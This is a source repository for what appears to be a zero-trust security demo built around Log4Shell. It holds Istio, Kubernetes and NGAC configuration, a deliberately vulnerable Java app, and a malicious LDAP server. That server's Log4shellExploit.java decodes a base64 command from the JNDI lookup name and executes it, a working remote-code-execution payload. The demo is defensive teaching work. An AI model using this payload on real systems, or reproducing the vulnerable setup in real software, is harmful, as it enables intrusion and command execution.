├── log4shell-ldap ├── exploit │ ├── .gitignore │ ├── pom.xml │ └── src │ │ └── main │ │ └── java │ │ └── io │ │ └── tetrate │ │ └── log4shell │ │ └── exploit │ │ └── Log4shellExploit.java ├── go.mod ├── Makefile ├── Dockerfile ├── go.sum └── main.go ├── k8s ├── .gitignore ├── local │ ├── uninstall.sh │ └── setup.sh ├── manifests │ ├── namespace.yaml │ ├── kustomization.yaml │ ├── istio-operator.yaml │ ├── vulnerable-app-ingress.yaml │ ├── vulnerable-app.yaml │ ├── log4shell-ldap.yaml │ └── istio-authservice.yaml ├── gke │ ├── certificate.yaml │ ├── issuer.yaml │ ├── uninstall.sh │ ├── setup.sh │ └── external-dns.yaml ├── Makefile ├── variables.example.env └── README.md ├── .gitignore ├── vulnerable-app ├── .gitignore ├── Makefile ├── Dockerfile ├── src │ └── main │ │ └── java │ │ └── io │ │ └── tetrate │ │ └── log4shell │ │ └── vulnerable │ │ ├── App.java │ │ └── GreetingsServlet.java └── pom.xml ├── wasm-patch ├── .gitignore ├── Dockerfile ├── go.mod ├── Makefile ├── go.sum ├── main_test.go ├── local-envoy.yaml └── main.go ├── ngac ├── namespace.yaml ├── authz-config.yaml ├── kustomization.yaml ├── Makefile ├── istio-operator.yaml ├── graph.txt ├── ngac-server.yaml ├── ngac-authz.yaml └── README.md ├── config ├── wasm-patch.yaml ├── ngac-policy.yaml ├── oidc-policy.yaml └── runtime-authn.yaml ├── Makefile ├── common.mk ├── docker-compose.yml ├── README.md └── DEMO.md /log4shell-ldap/exploit/.gitignore: -------------------------------------------------------------------------------- 1 | target/ -------------------------------------------------------------------------------- /k8s/.gitignore: -------------------------------------------------------------------------------- 1 | variables.env 2 | .swp 3 | 4 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | .history 2 | .vscode 3 | .vimrc 4 | .idea 5 | .swp 6 | -------------------------------------------------------------------------------- /vulnerable-app/.gitignore: -------------------------------------------------------------------------------- 1 | target/ 2 | .vscode/ 3 | .swp 4 | 5 | -------------------------------------------------------------------------------- /wasm-patch/.gitignore: -------------------------------------------------------------------------------- 1 | *.wasm 2 | .vscode 3 | .vimrc 4 | .idea 5 | *.swp 6 | -------------------------------------------------------------------------------- /k8s/local/uninstall.sh: -------------------------------------------------------------------------------- 1 | kubectl delete secret ingress-tls-cert -n istio-system --ignore-not-found -------------------------------------------------------------------------------- /ngac/namespace.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Namespace 3 | metadata: 4 | name: ngac 5 | labels: 6 | istio-injection: enabled 7 | -------------------------------------------------------------------------------- /k8s/manifests/namespace.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Namespace 3 | metadata: 4 | name: zta-demo 5 | labels: 6 | istio-injection: enabled 7 | -------------------------------------------------------------------------------- /k8s/manifests/kustomization.yaml: -------------------------------------------------------------------------------- 1 | resources: 2 | - namespace.yaml 3 | 
- log4shell-ldap.yaml 4 | - vulnerable-app.yaml 5 | - istio-authservice.yaml 6 | 7 | namespace: zta-demo 8 | -------------------------------------------------------------------------------- /log4shell-ldap/go.mod: -------------------------------------------------------------------------------- 1 | module log4shell-ldap 2 | 3 | go 1.17 4 | 5 | require ( 6 | github.com/vjeantet/ldapserver v1.0.1 7 | github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3 8 | ) 9 | -------------------------------------------------------------------------------- /log4shell-ldap/Makefile: -------------------------------------------------------------------------------- 1 | -include ../common.mk 2 | 3 | NAME := log4shell-ldap 4 | 5 | docker-build: 6 | docker build --platform linux/amd64 -t $(HUB)/$(NAME):$(TAG) . 7 | 8 | docker-push: 9 | docker push $(HUB)/$(NAME):$(TAG) 10 | -------------------------------------------------------------------------------- /vulnerable-app/Makefile: -------------------------------------------------------------------------------- 1 | -include ../common.mk 2 | 3 | NAME := vulnerable 4 | 5 | docker-build: 6 | docker build --platform linux/amd64 -t $(HUB)/$(NAME):$(TAG) . 7 | 8 | docker-push: 9 | docker push $(HUB)/$(NAME):$(TAG) 10 | -------------------------------------------------------------------------------- /wasm-patch/Dockerfile: -------------------------------------------------------------------------------- 1 | # Dockerfile for building "compat" variant of Wasm Image Specification. 2 | # https://github.com/solo-io/wasm/blob/master/spec/spec-compat.md 3 | FROM scratch 4 | 5 | ARG WASM_BINARY_PATH 6 | COPY ${WASM_BINARY_PATH} ./plugin.wasm -------------------------------------------------------------------------------- /ngac/authz-config.yaml: -------------------------------------------------------------------------------- 1 | resolvers: 2 | principal: 3 | - name: jwt_bearer 4 | params: 5 | header: authorization 6 | prefix: "Bearer " 7 | subject-claim: "https://zta-demo/group" 8 | operation: 9 | - name: method 10 | resource: 11 | - name: request_path 12 | -------------------------------------------------------------------------------- /config/wasm-patch.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: extensions.istio.io/v1alpha1 2 | kind: WasmPlugin 3 | metadata: 4 | name: log4shell-patch 5 | namespace: zta-demo 6 | spec: 7 | selector: 8 | matchLabels: 9 | language: java 10 | url: oci://${WASM_HUB}/log4shell-patch:${TAG} 11 | imagePullPolicy: Always 12 | -------------------------------------------------------------------------------- /k8s/gke/certificate.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: cert-manager.io/v1 2 | kind: Certificate 3 | metadata: 4 | name: ingress-cert 5 | namespace: istio-system 6 | spec: 7 | secretName: ingress-tls-cert 8 | issuerRef: 9 | name: letsencrypt-issuer 10 | kind: ClusterIssuer 11 | dnsNames: 12 | - ${DOMAIN} 13 | -------------------------------------------------------------------------------- /k8s/manifests/istio-operator.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: install.istio.io/v1alpha1 2 | kind: IstioOperator 3 | spec: 4 | profile: demo 5 | meshConfig: 6 | extensionProviders: 7 | - name: "authservice-grpc" 8 | envoyExtAuthzGrpc: 9 | service: "authservice.zta-demo.svc.cluster.local" 10 | port: "10003" 11 | 
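# The "authservice-grpc" provider defined above is referenced by name from the CUSTOM AuthorizationPolicy in config/oidc-policy.yaml.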
-------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | include common.mk 2 | 3 | APPS := log4shell-ldap vulnerable-app wasm-patch 4 | 5 | docker-build: $(APPS:%=docker-build/%) 6 | docker-push: $(APPS:%=docker-push/%) 7 | 8 | docker-build/%: 9 | $(MAKE) -C $(@F) $(@D) 10 | 11 | docker-push/%: 12 | $(MAKE) -C $(@F) $(@D) 13 | 14 | clean: 15 | $(MAKE) -C wasm-patch clean 16 | -------------------------------------------------------------------------------- /config/ngac-policy.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: security.istio.io/v1beta1 2 | kind: AuthorizationPolicy 3 | metadata: 4 | name: ngac-authz 5 | namespace: zta-demo 6 | spec: 7 | selector: 8 | matchLabels: 9 | app: vulnerable 10 | action: CUSTOM 11 | provider: 12 | name: ngac-grpc 13 | rules: 14 | - to: 15 | - operation: 16 | paths: ["/*"] 17 | -------------------------------------------------------------------------------- /ngac/kustomization.yaml: -------------------------------------------------------------------------------- 1 | resources: 2 | - namespace.yaml 3 | - ngac-server.yaml 4 | - ngac-authz.yaml 5 | 6 | namespace: ngac 7 | 8 | configMapGenerator: 9 | - name: ngac-graph 10 | files: 11 | - graph.txt 12 | - name: ngac-authz-config 13 | files: 14 | - resolver.yaml=authz-config.yaml 15 | 16 | generatorOptions: 17 | disableNameSuffixHash: true 18 | -------------------------------------------------------------------------------- /config/oidc-policy.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: security.istio.io/v1beta1 2 | kind: AuthorizationPolicy 3 | metadata: 4 | name: ext-authz 5 | namespace: istio-system 6 | spec: 7 | selector: 8 | matchLabels: 9 | app: istio-ingressgateway 10 | action: CUSTOM 11 | provider: 12 | name: authservice-grpc 13 | rules: 14 | - to: 15 | - operation: 16 | paths: ["/*"] 17 | -------------------------------------------------------------------------------- /config/runtime-authn.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: security.istio.io/v1beta1 2 | kind: AuthorizationPolicy 3 | metadata: 4 | name: allow-from-ingress 5 | namespace: zta-demo 6 | spec: 7 | selector: 8 | matchLabels: 9 | app: vulnerable 10 | action: ALLOW 11 | rules: 12 | - from: 13 | - source: 14 | principals: ["cluster.local/ns/istio-system/sa/istio-ingressgateway-service-account"] 15 | -------------------------------------------------------------------------------- /common.mk: -------------------------------------------------------------------------------- 1 | # Common variables 2 | 3 | # Change to push application images to a different registry 4 | export HUB ?= gcr.io/ignasi-nist-2022 5 | 6 | # Istio 1.12 does not yet support imagePullSecrets in 7 | # WasmPlugins to pull images from private registries. 8 | # We need to push the WASM patch to a public Docker registry. 9 | export WASM_HUB ?= docker.io/nacx 10 | 11 | # Tag used for all the iamges 12 | export TAG ?= 0.1 13 | -------------------------------------------------------------------------------- /ngac/Makefile: -------------------------------------------------------------------------------- 1 | 2 | install: 3 | istioctl install -y -f istio-operator.yaml 4 | kustomize build . 
| kubectl apply -f - 5 | 6 | uninstall: unconfigure 7 | @# Restore the original Istio config, without NGAC 8 | istioctl install -y -f ../k8s/manifests/istio-operator.yaml 9 | kustomize build . | kubectl delete --ignore-not-found -f - 10 | 11 | unconfigure: 12 | kubectl delete --ignore-not-found -f ../config/ngac-policy.yaml 13 | -------------------------------------------------------------------------------- /wasm-patch/go.mod: -------------------------------------------------------------------------------- 1 | module io.tetrate.log4shell.patch 2 | 3 | go 1.17 4 | 5 | require ( 6 | github.com/buger/jsonparser v1.1.1 7 | github.com/stretchr/testify v1.7.0 8 | github.com/tetratelabs/proxy-wasm-go-sdk v0.16.0 9 | ) 10 | 11 | require ( 12 | github.com/davecgh/go-spew v1.1.1 // indirect 13 | github.com/pmezard/go-difflib v1.0.0 // indirect 14 | gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b // indirect 15 | ) 16 | -------------------------------------------------------------------------------- /ngac/istio-operator.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: install.istio.io/v1alpha1 2 | kind: IstioOperator 3 | spec: 4 | profile: demo 5 | meshConfig: 6 | extensionProviders: 7 | - name: "authservice-grpc" 8 | envoyExtAuthzGrpc: 9 | service: "authservice.zta-demo.svc.cluster.local" 10 | port: "10003" 11 | - name: "ngac-grpc" 12 | envoyExtAuthzGrpc: 13 | service: "ngac-authz.ngac.svc.cluster.local" 14 | port: "8080" 15 | -------------------------------------------------------------------------------- /log4shell-ldap/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM maven:3-jdk-8 as javabuilder 2 | RUN mkdir /build/ 3 | COPY exploit/ /build 4 | RUN cd /build && mvn package 5 | 6 | FROM golang:1.16 as gobuilder 7 | WORKDIR / 8 | COPY go.* ./ 9 | COPY main.go . 10 | RUN go mod download 11 | COPY --from=javabuilder /build/target/log4shell-exploit-1.0-SNAPSHOT.jar . 12 | RUN CGO_ENABLED=0 GOOS=linux go build -a -tags app -o app -ldflags '-w' . 13 | 14 | FROM scratch 15 | COPY --from=gobuilder /app /app 16 | ENTRYPOINT ["/app"] 17 | EXPOSE 3000 18 | EXPOSE 1389 19 | -------------------------------------------------------------------------------- /wasm-patch/Makefile: -------------------------------------------------------------------------------- 1 | -include ../common.mk 2 | 3 | NAME := log4shell-patch 4 | WASM := $(NAME).wasm 5 | 6 | OUT := $(WASM) 7 | 8 | compile: $(OUT) 9 | 10 | $(OUT): 11 | tinygo build -o $(OUT) -scheduler=none -target=wasi ./... 12 | 13 | test: 14 | go test -v -tags=proxytest ./... 15 | 16 | clean: 17 | rm -f $(OUT) 18 | 19 | docker-build: $(OUT) 20 | docker build --platform linux/amd64 --build-arg WASM_BINARY_PATH=$(OUT) -t $(WASM_HUB)/$(NAME):$(TAG) . 
21 | 22 | docker-push: 23 | docker push $(WASM_HUB)/$(NAME):$(TAG) 24 | -------------------------------------------------------------------------------- /k8s/gke/issuer.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: cert-manager.io/v1 2 | kind: ClusterIssuer 3 | metadata: 4 | name: letsencrypt-issuer 5 | namespace: cert-manager 6 | spec: 7 | acme: 8 | email: ${EMAIL} 9 | server: https://acme-v02.api.letsencrypt.org/directory 10 | preferredChain: "ISRG Root X1" 11 | privateKeySecretRef: 12 | name: letsencrypt-issuer-key 13 | solvers: 14 | - dns01: 15 | cloudDNS: 16 | project: ${PROJECT_ID} 17 | serviceAccountSecretRef: 18 | name: clouddns-dns01-solver-sa 19 | key: key.json 20 | -------------------------------------------------------------------------------- /log4shell-ldap/go.sum: -------------------------------------------------------------------------------- 1 | github.com/logrusorgru/aurora v2.0.3+incompatible h1:tOpm7WcpBTn4fjmVfgpQq0EfczGlG91VSDkswnjF5A8= 2 | github.com/logrusorgru/aurora v2.0.3+incompatible/go.mod h1:7rIyQOR62GCctdiQpZ/zOJlFyk6y+94wXzv6RNZgaR4= 3 | github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3 h1:wIONC+HMNRqmWBjuMxhatuSzHaljStc4gjDeKycxy0A= 4 | github.com/lor00x/goldap v0.0.0-20180618054307-a546dffdd1a3/go.mod h1:37YR9jabpiIxsb8X9VCIx8qFOjTDIIrIHHODa8C4gz0= 5 | github.com/vjeantet/ldapserver v1.0.1 h1:3z+TCXhwwDLJC3pZCNbuECPDqC2x1R7qQQbswB1Qwoc= 6 | github.com/vjeantet/ldapserver v1.0.1/go.mod h1:YvUqhu5vYhmbcLReMLrm/Tq3S7Yj43kSVFvvol6Lh6k= 7 | -------------------------------------------------------------------------------- /vulnerable-app/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM maven:3-jdk-8 as builder 2 | RUN mkdir /build/ 3 | WORKDIR /build 4 | COPY ./ ./ 5 | # predownlaod dependencies to favour docker caching 6 | RUN mvn verify 7 | RUN mvn clean compile assembly:single 8 | 9 | FROM openjdk:8u102-jdk 10 | COPY --from=builder /build/target/vulnerable-1.0-SNAPSHOT-jar-with-dependencies.jar . 
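# Note: openjdk 8u102 predates JDK 8u191, where remote class loading over LDAP (com.sun.jndi.ldap.object.trustURLCodebase) was disabled by default, so the Log4Shell exploit chain works here without extra JVM flags.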
11 | EXPOSE 8080 12 | #ENV LOG4J_FORMAT_MSG_NO_LOOKUPS=false 13 | #CMD java -Dcom.sun.jndi.ldap.object.trustURLCodebase=true -Dcom.sun.jndi.rmi.object.trustURLCodebase=true -jar vulnerable-1.0-SNAPSHOT-jar-with-dependencies.jar 14 | CMD java -jar vulnerable-1.0-SNAPSHOT-jar-with-dependencies.jar 15 | -------------------------------------------------------------------------------- /log4shell-ldap/exploit/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 4.0.0 5 | io.tetrate 6 | log4shell-exploit 7 | 1.0-SNAPSHOT 8 | 9 | 10 | 8 11 | 8 12 | 13 | 14 | 15 | -------------------------------------------------------------------------------- /k8s/gke/uninstall.sh: -------------------------------------------------------------------------------- 1 | kubectl delete secret ingress-tls-cert -n istio-system --ignore-not-found 2 | kubectl delete secret clouddns-dns01-solver-sa -n cert-manager --ignore-not-found 3 | 4 | envsubst < external-dns.yaml | kubectl delete --ignore-not-found -f - 5 | envsubst < issuer.yaml | kubectl delete --ignore-not-found -f - 6 | envsubst < certificate.yaml | kubectl delete --ignore-not-found -f - 7 | 8 | kubectl delete -f https://github.com/jetstack/cert-manager/releases/download/v1.6.1/cert-manager.yaml 9 | 10 | kubectl delete namespace cert-manager --ignore-not-found 11 | 12 | gcloud iam service-accounts delete dns01-solver@${PROJECT_ID}.iam.gserviceaccount.com --quiet 13 | -------------------------------------------------------------------------------- /k8s/Makefile: -------------------------------------------------------------------------------- 1 | 2 | install/%: 3 | istioctl install -y -f manifests/istio-operator.yaml 4 | cd $(@F) && bash setup.sh 5 | kustomize build manifests/ | envsubst | kubectl apply -f - 6 | envsubst < manifests/vulnerable-app-ingress.yaml | kubectl apply -f - 7 | 8 | uninstall/%: unconfigure 9 | kustomize build manifests/ | envsubst | kubectl delete --ignore-not-found -f - 10 | cd $(@F) && bash uninstall.sh 11 | istioctl x uninstall --purge -y 12 | kubectl delete namespace istio-system --ignore-not-found 13 | 14 | unconfigure: 15 | kubectl delete --ignore-not-found -f ../config/oidc-policy.yaml 16 | kubectl delete --ignore-not-found -f ../config/runtime-authn.yaml 17 | envsubst < ../config/wasm-patch.yaml | kubectl delete --ignore-not-found -f - 18 | -------------------------------------------------------------------------------- /k8s/manifests/vulnerable-app-ingress.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: networking.istio.io/v1alpha3 2 | kind: Gateway 3 | metadata: 4 | name: vulnerable 5 | namespace: zta-demo 6 | spec: 7 | selector: 8 | istio: ingressgateway 9 | servers: 10 | - port: 11 | number: 443 12 | name: https 13 | protocol: HTTPS 14 | tls: 15 | mode: SIMPLE 16 | credentialName: ingress-tls-cert 17 | hosts: 18 | - "${INGRESS_HOST}" 19 | --- 20 | apiVersion: networking.istio.io/v1alpha3 21 | kind: VirtualService 22 | metadata: 23 | name: vulnerable 24 | namespace: zta-demo 25 | spec: 26 | hosts: 27 | - "${INGRESS_HOST}" 28 | gateways: 29 | - vulnerable 30 | http: 31 | - route: 32 | - destination: 33 | host: vulnerable 34 | port: 35 | number: 8080 36 | -------------------------------------------------------------------------------- /vulnerable-app/src/main/java/io/tetrate/log4shell/vulnerable/App.java: -------------------------------------------------------------------------------- 1 | package io.tetrate.log4shell.vulnerable; 
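// Bootstraps an embedded Jetty server on port 8080 and mounts GreetingsServlet at "/".
// GreetingsServlet logs the raw claims of any JWT it receives, which is what exposes the
// vulnerable log4j dependency to Log4Shell payloads embedded in those claims.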
2 | 3 | import org.apache.logging.log4j.Level; 4 | import org.apache.logging.log4j.core.config.Configurator; 5 | import org.eclipse.jetty.server.Server; 6 | import org.eclipse.jetty.servlet.ServletContextHandler; 7 | 8 | public final class App { 9 | 10 | public static void main(String[] args) throws Exception { 11 | Configurator.setRootLevel(Level.INFO); 12 | Configurator.setLevel(GreetingsServlet.class.getName(), Level.DEBUG); 13 | 14 | Server server = new Server(8080); 15 | ServletContextHandler handler = new ServletContextHandler(server, "/"); 16 | handler.addServlet(GreetingsServlet.class, "/"); 17 | server.start(); 18 | } 19 | 20 | } 21 | -------------------------------------------------------------------------------- /docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "3.9" 2 | 3 | services: 4 | 5 | # vulnerable application exploitable with log4shell 6 | vulnerable: 7 | build: vulnerable-app 8 | ports: 9 | - 8080:8080 10 | 11 | # malicious LDAP server providing log4shell exploits 12 | log4shell: 13 | build: log4shell-ldap 14 | environment: 15 | - publicIp=log4shell 16 | ports: 17 | - 3000:3000 18 | - 1389:1389 19 | 20 | # Envoy proxy with the wasm-patch loaded to prevent log4shell attacks 21 | envoy: 22 | image: envoyproxy/envoy:v1.21.0 23 | command: -c /opt/log4shell/envoy.yaml 24 | ports: 25 | - 8000:8000 26 | volumes: 27 | - "./wasm-patch/local-envoy.yaml:/opt/log4shell/envoy.yaml" 28 | - "./wasm-patch/log4shell-patch.wasm:/opt/log4shell/log4shell-patch.wasm" 29 | -------------------------------------------------------------------------------- /k8s/local/setup.sh: -------------------------------------------------------------------------------- 1 | source ../variables.env 2 | 3 | set -e 4 | 5 | DAYS=1825 # 5 years 6 | CN=localhost 7 | OUTDIR=$(mktemp -d) 8 | 9 | pushd . 10 | mkdir -p ${OUTDIR} 11 | cd ${OUTDIR} 12 | 13 | echo "Generating the CA..." 14 | openssl genrsa -out ca.key 2048 15 | openssl req -x509 -new -nodes -key ca.key -sha256 -out ca.crt -days ${DAYS} -subj "/C=US/ST=California/L=San Francisco/O=Tetrate" 16 | 17 | echo "Generating the server certificate..." 
18 | openssl genrsa -out cert.key 2048 19 | openssl req -new -key cert.key -out cert.csr -subj "/C=US/ST=California/L=San Francisco/O=Tetrate/CN=${CN}" 20 | openssl x509 -req -extfile <(printf "subjectAltName=DNS:${CN}") -in cert.csr -CA ca.crt -CAkey ca.key -CAcreateserial -out cert.crt -days ${DAYS} -sha256 21 | 22 | kubectl delete secret -n istio-system ingress-tls-cert --ignore-not-found 23 | kubectl create secret tls -n istio-system ingress-tls-cert --key=cert.key --cert=cert.crt 24 | 25 | popd 26 | -------------------------------------------------------------------------------- /ngac/graph.txt: -------------------------------------------------------------------------------- 1 | # Create a couple user nodes representing the gropus 2 | node U Engineering 3 | node U Admins 4 | node UA privileged 5 | node UA unprivileged 6 | node UA everyone 7 | assign Engineering unprivileged 8 | assign Admins privileged 9 | assign privileged everyone 10 | assign unprivileged everyone 11 | 12 | # Model HTTP paths we want to enforce access to 13 | node O / 14 | node O /private 15 | node OA protected 16 | node OA unprotected 17 | node OA kind 18 | assign / unprotected 19 | assign /private protected 20 | assign protected kind 21 | assign unprotected kind 22 | 23 | # Create an "http" policy to enforce access from groups to the configured paths 24 | node PC http 25 | assign everyone http 26 | assign kind http 27 | 28 | # Configure permissions to each path: 29 | # - Users from all groups can do requests to public paths 30 | # - Only members of the "Admins" team can do post requests to the private paths 31 | assoc everyone unprotected GET 32 | assoc privileged protected GET 33 | -------------------------------------------------------------------------------- /k8s/manifests/vulnerable-app.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: vulnerable 5 | labels: 6 | app: vulnerable 7 | language: java 8 | spec: 9 | ports: 10 | - port: 8080 11 | targetPort: 8080 12 | name: http 13 | selector: 14 | app: vulnerable 15 | --- 16 | apiVersion: v1 17 | kind: ServiceAccount 18 | metadata: 19 | name: vulnerable 20 | labels: 21 | app: vulnerable 22 | --- 23 | apiVersion: apps/v1 24 | kind: Deployment 25 | metadata: 26 | name: vulnerable 27 | labels: 28 | app: vulnerable 29 | language: java 30 | spec: 31 | selector: 32 | matchLabels: 33 | app: vulnerable 34 | template: 35 | metadata: 36 | annotations: 37 | sidecar.istio.io/logLevel: "jwt:debug,ext_authz:debug,rbac:debug,wasm:debug" 38 | labels: 39 | app: vulnerable 40 | language: java 41 | spec: 42 | serviceAccountName: vulnerable 43 | containers: 44 | - name: vulnerable 45 | image: ${HUB}/vulnerable:${TAG} 46 | imagePullPolicy: Always 47 | ports: 48 | - name: http 49 | containerPort: 8080 50 | -------------------------------------------------------------------------------- /k8s/manifests/log4shell-ldap.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: log4shell 5 | labels: 6 | app: log4shell 7 | spec: 8 | ports: 9 | - port: 3000 10 | targetPort: 3000 11 | name: http 12 | - port: 1389 13 | targetPort: 1389 14 | name: tcp-ldap 15 | selector: 16 | app: log4shell 17 | --- 18 | apiVersion: v1 19 | kind: ServiceAccount 20 | metadata: 21 | name: log4shell 22 | labels: 23 | app: log4shell 24 | --- 25 | apiVersion: apps/v1 26 | kind: Deployment 27 | metadata: 28 | name: log4shell 29 | 
labels: 30 | app: log4shell 31 | spec: 32 | selector: 33 | matchLabels: 34 | app: log4shell 35 | template: 36 | metadata: 37 | labels: 38 | app: log4shell 39 | spec: 40 | serviceAccountName: log4shell 41 | containers: 42 | - name: log4shell-ldap 43 | image: ${HUB}/log4shell-ldap:${TAG} 44 | imagePullPolicy: Always 45 | env: 46 | - name: publicIp 47 | value: log4shell 48 | ports: 49 | - name: http 50 | containerPort: 3000 51 | - name: tcp-ldap 52 | containerPort: 1389 53 | -------------------------------------------------------------------------------- /k8s/gke/setup.sh: -------------------------------------------------------------------------------- 1 | source ../variables.env 2 | 3 | # Install cert-manager 4 | kubectl apply -f https://github.com/jetstack/cert-manager/releases/download/v1.6.1/cert-manager.yaml 5 | 6 | # Make sure the Cloud DNS API is enabled 7 | gcloud services enable dns.googleapis.com containerregistry.googleapis.com --project=${PROJECT_ID} 8 | 9 | # Configure the service account and secret cert-manager will use 10 | # to solve the ACME challenges presented by Let's Encrypt when issuing 11 | # certificates. 12 | # This account will be used by external-dns as well to automatically create 13 | # DNS records for the hostnames exposed in the mesh. 14 | gcloud iam service-accounts create dns01-solver \ 15 | --project ${PROJECT_ID} \ 16 | --display-name "dns01-solver" 17 | 18 | gcloud projects add-iam-policy-binding ${PROJECT_ID} \ 19 | --member serviceAccount:dns01-solver@${PROJECT_ID}.iam.gserviceaccount.com \ 20 | --role roles/dns.admin 21 | 22 | gcloud iam service-accounts keys create /tmp/key.json \ 23 | --iam-account dns01-solver@${PROJECT_ID}.iam.gserviceaccount.com 24 | 25 | kubectl delete secret clouddns-dns01-solver-sa --ignore-not-found 26 | kubectl create secret generic clouddns-dns01-solver-sa \ 27 | -n cert-manager \ 28 | --from-file=/tmp/key.json 29 | 30 | envsubst < external-dns.yaml | kubectl apply -n cert-manager -f - 31 | 32 | echo "Waiting a bit for cert-manager..." 
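# cert-manager's webhook takes a while to become ready; applying the Issuer and Certificate too early fails webhook validation (if that happens, simply re-run the install as noted in the README).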
33 | sleep 60 34 | 35 | envsubst < issuer.yaml | kubectl apply -f - 36 | envsubst < certificate.yaml | kubectl apply -f - 37 | -------------------------------------------------------------------------------- /log4shell-ldap/exploit/src/main/java/io/tetrate/log4shell/exploit/Log4shellExploit.java: -------------------------------------------------------------------------------- 1 | package io.tetrate.log4shell.exploit; 2 | 3 | import javax.naming.Context; 4 | import javax.naming.Name; 5 | import javax.naming.spi.ObjectFactory; 6 | 7 | import java.io.IOException; 8 | import java.io.InputStream; 9 | import java.util.Base64; 10 | import java.util.Hashtable; 11 | import java.util.Scanner; 12 | 13 | public class Log4shellExploit implements ObjectFactory { 14 | 15 | @Override 16 | public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable environment) { 17 | InputStream in = null; 18 | Scanner sc = null; 19 | 20 | System.out.println("/!\\ /!\\ /!\\ You have been pwned!"); 21 | System.out.println("/!\\ /!\\ /!\\ RCE exploit loaded"); 22 | 23 | try { 24 | String encoded = name.toString().replaceAll("exec/", "").replaceAll("\"", ""); 25 | String cmd = new String(Base64.getDecoder().decode(encoded)); 26 | System.out.println("/!\\ /!\\ /!\\ Executing: " + cmd); 27 | 28 | in = Runtime.getRuntime().exec(cmd).getInputStream(); 29 | sc = new Scanner(in).useDelimiter("\\A"); 30 | if (sc.hasNext()) System.out.println(sc.next()); 31 | } catch (Exception ex) { 32 | ex.printStackTrace(); 33 | } finally { 34 | try { 35 | if (in != null) in.close(); 36 | if (sc != null) sc.close(); 37 | } catch (IOException e) { 38 | } 39 | } 40 | 41 | return "pwned!"; 42 | } 43 | } 44 | -------------------------------------------------------------------------------- /wasm-patch/go.sum: -------------------------------------------------------------------------------- 1 | github.com/buger/jsonparser v1.1.1 h1:2PnMjfWD7wBILjqQbt530v576A/cAbQvEW9gGIpYMUs= 2 | github.com/buger/jsonparser v1.1.1/go.mod h1:6RYKKt7H4d4+iWqouImQ9R2FZql3VbhNgx27UK13J/0= 3 | github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 4 | github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c= 5 | github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38= 6 | github.com/pmezard/go-difflib v1.0.0 h1:4DBwDE0NGyQoBHbLQYPwSUPoCMWR5BEzIk/f1lZbAQM= 7 | github.com/pmezard/go-difflib v1.0.0/go.mod h1:iKH77koFhYxTK1pcRnkKkqfTogsbg7gZNVY4sRDYZ/4= 8 | github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME= 9 | github.com/stretchr/testify v1.7.0 h1:nwc3DEeHmmLAfoZucVR881uASk0Mfjw8xYJ99tb5CcY= 10 | github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg= 11 | github.com/tetratelabs/proxy-wasm-go-sdk v0.16.0 h1:6xhDLV4DD2+q3Rs4CDh7cqo69rQ50XgCusv/58D44o4= 12 | github.com/tetratelabs/proxy-wasm-go-sdk v0.16.0/go.mod h1:8CxNZJ+9yDEvNnAog384fC8j1tKNF0tTZevGjOuY9ds= 13 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405 h1:yhCVgyC4o1eVCa2tZl7eS0r+SDo693bJlVdllGtEeKM= 14 | gopkg.in/check.v1 v0.0.0-20161208181325-20d25e280405/go.mod h1:Co6ibVJAznAaIkqp8huTwlJQCZ016jof/cbN4VW5Yz0= 15 | gopkg.in/yaml.v3 v3.0.0-20200313102051-9f266ea9e77c/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 16 | gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b h1:h8qDotaEPuJATrMmW04NCwg7v22aHH28wwpauUhK9Oo= 17 | gopkg.in/yaml.v3 v3.0.0-20210107192922-496545a6307b/go.mod h1:K4uyk7z7BCEPqu6E+C64Yfv1cQ7kz7rIZviUmN+EgEM= 18 
